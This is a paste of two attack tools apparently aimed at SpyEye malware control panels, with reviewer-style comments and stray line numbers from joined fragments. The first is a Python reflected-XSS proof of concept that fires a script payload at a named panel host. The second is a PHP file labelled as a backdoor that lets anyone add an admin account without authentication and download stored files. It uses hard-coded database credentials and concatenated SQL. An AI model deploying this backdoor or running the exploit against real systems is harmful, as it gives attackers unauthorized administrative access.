  2. # SpyEye version ? reflected XSS POC
  3. # Xartrick
  4. # Xylitol
  5.  
  6. import urllib
  7. import urllib2
  8.  
# Configuration ...
#
# Reflected-XSS check against a single panel endpoint: the marker string in
# sPayload is sent to mod_savecert.php and the response body is searched for
# it verbatim.  A hit only shows the input comes back unencoded; it says
# nothing about the HTML context it lands in, so the reflected position still
# has to be inspected by hand before treating the finding as confirmed.
# Python 2 script (urllib.urlencode / urllib2); print(...) with one argument
# is valid on both 2 and 3.

sPayload = '<script>alert(1);</script>'
sPanel = 'http://drookinabra.ru/adm/frmcp2/'
# The marker also goes into the `id` query parameter, without URL-encoding;
# only the POST body below is passed through urlencode().
sURL = sPanel + 'mod_savecert.php?id=' + sPayload

# Exploitation

sPOST = {'host' : sPayload}
sData = urllib.urlencode(sPOST)
# Supplying a data argument makes urllib2 send a POST instead of a GET.
oURL = urllib2.Request(sURL, sData)
# No try/except: a non-2xx status, DNS failure or timeout raises here.
oResponse = urllib2.urlopen(oURL)
sPage = oResponse.read()

# Plain substring test on the raw payload: an HTML-encoded reflection
# (&lt;script&gt;) does not match and is reported as "not vulnerable".
if (sPayload in sPage):
    print("Exploitation works, the vulnerabily exists!")
else:
    print("You are a bad hacker!")
  27. Type: Backdoor
  28.  
  29. Author: Xylitol
  30.  
  31. <?php
  32. // Xyl2k :รพ
  33. // Thanks to EsSandre for the additional help.
  34.  
  35. $MySQLI = array();
  36.  
  37. /* MySQLI ID */
  38.  
  39. $MySQLI['HOST'] = 'localhost';
  40. $MySQLI['USER'] = 'root';
  41. $MySQLI['PASS'] = 'toor';
  42. $MySQLI['DB'] = 'maincp';
  43.  
  44. function str_error($error)
  45. {
  46. print '<p style="color:red;">'.htmlentities($error).'</p>';
  47. }
  48.  
  49. function download_binary($path_file, $buf)
  50. {
  51. header("Pragma: public");
  52. header("Expires: 0");
  53. header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
  54. header("Cache-Control: private", false);
  55. header("Content-Type: application/octet-stream");
  56. header("Content-Disposition: attachment; filename=\"".basename($path_file)."\";" );
  57.  
  58. header("Content-Transfer-Encoding: binary");
  59. header("Content-Length: ".strlen($buf));
  60.  
  61. echo $buf;
  62. }
  63.  
// Connect with the hard-coded credentials above.  The connection error is
// only checked further down (mysqli_connect_errno), after the registration
// branch has already issued its INSERT on this handle.
$mysqli = new mysqli($MySQLI['HOST'], $MySQLI['USER'], $MySQLI['PASS'], $MySQLI['DB']);

// Branch 1: submission of the "Add an Admin Account" form rendered below.
// Nothing in this script gates it (no session check, login or CSRF token):
// any client that can reach the file can add a row to users_t.
if (isset($_POST['register_submit']))
{
    // Dropping `id` makes the download branch below skip this request.
    unset($_GET['id']);
    if (isset($_POST['user']) && !is_array($_POST['user']) && !empty($_POST['user']))
    {
        if (isset($_POST['password']) && !is_array($_POST['password']) && !empty($_POST['password']))
        {
            if (trim($_POST['user']) == '' || trim($_POST['password']) == '')
                str_error('An error has occurred');
            else
            {
                // NOTE(review): mysql_real_escape_string() is the ext/mysql function and
                // needs an ext/mysql link; this script only opens a mysqli handle.  If no
                // such link can be opened it returns false with a warning instead of an
                // escaped string, and the function does not exist on PHP 7+.  Either way
                // the INSERT below is built by concatenation, not bound parameters, and
                // its result is never checked.
                $user = mysql_real_escape_string($_POST['user']);
                // Unsalted MD5 of the submitted password is what gets stored.
                $password = md5($_POST['password']);
                $mysqli->query("INSERT INTO users_t VALUES('', '".$user."', '".$password."', '', '')");
                echo '<p style="color:green;">User added successfully</p>';
            }
        }
        else
            str_error('An error has occurred');
    }
    else
        str_error('An error has occurred');
}

// str_error() prints the message itself and returns nothing, so die() adds no output.
if (mysqli_connect_errno())
    die(str_error('MySQLI Connect : '.mysqli_connect_error()));

// Branch 2: ?id=N streams the matching files_t row back as a download.
if (isset($_GET['id']) && !empty($_GET['id']) && !is_array($_GET['id']))
{
    // is_numeric() accepts more than plain integers (sign, decimals, exponent,
    // leading whitespace); the value is still concatenated into the SQL
    // string rather than bound.
    if (is_numeric($_GET['id']) && $_GET['id'] > 0)
    {
        $id = $_GET['id'];
        $sql = $mysqli->query('SELECT fName, fCont FROM files_t WHERE fId=\''.$id.'\'');
        if ($sql->num_rows)
        {
            $_sql = $sql->fetch_array(MYSQLI_ASSOC);
            // fName comes from the database and reaches the Content-Disposition
            // header in download_binary() without any escaping.
            download_binary($_sql['fName'], $_sql['fCont']);
        }
        else
            str_error('Invalid file');
    }
    else
        str_error('Invalid file');
}
// Branch 3: no id -> render the add-account form followed by the file listing.
else
{
    echo '<h3>Add an Admin Account</h3><br />
<form action="'.basename($_SERVER['PHP_SELF']).'" method="POST">
<label for="user">Username</label><br /><input name="user" type="text"/><br /><br />
<label for="user">Password</label><br /><input name="password" type="password"/><br /><br />
<input name="register_submit" value="Register" type="submit"/>
</form>';

    // fCont is selected but unused here; only fId and fName are rendered.
    $sql = $mysqli->query('SELECT fId, fName, fCont FROM files_t');
    if (!$sql)
        die(str_error('MySQLI :: Query error : '.$mysqli->error));

    echo "\n<h3>List of available file in database</h3><br />\n";

    // fName is HTML-escaped for the link text; fId is written raw into the href.
    while($row = $sql->fetch_array(MYSQLI_ASSOC))
    {
        echo "<a href=\"".basename($_SERVER['PHP_SELF'])."?id=".$row['fId']."\">".htmlentities($row['fName'])."</a><br /><br />\n";
    }
}
mysqli_close($mysqli);
  132. ?>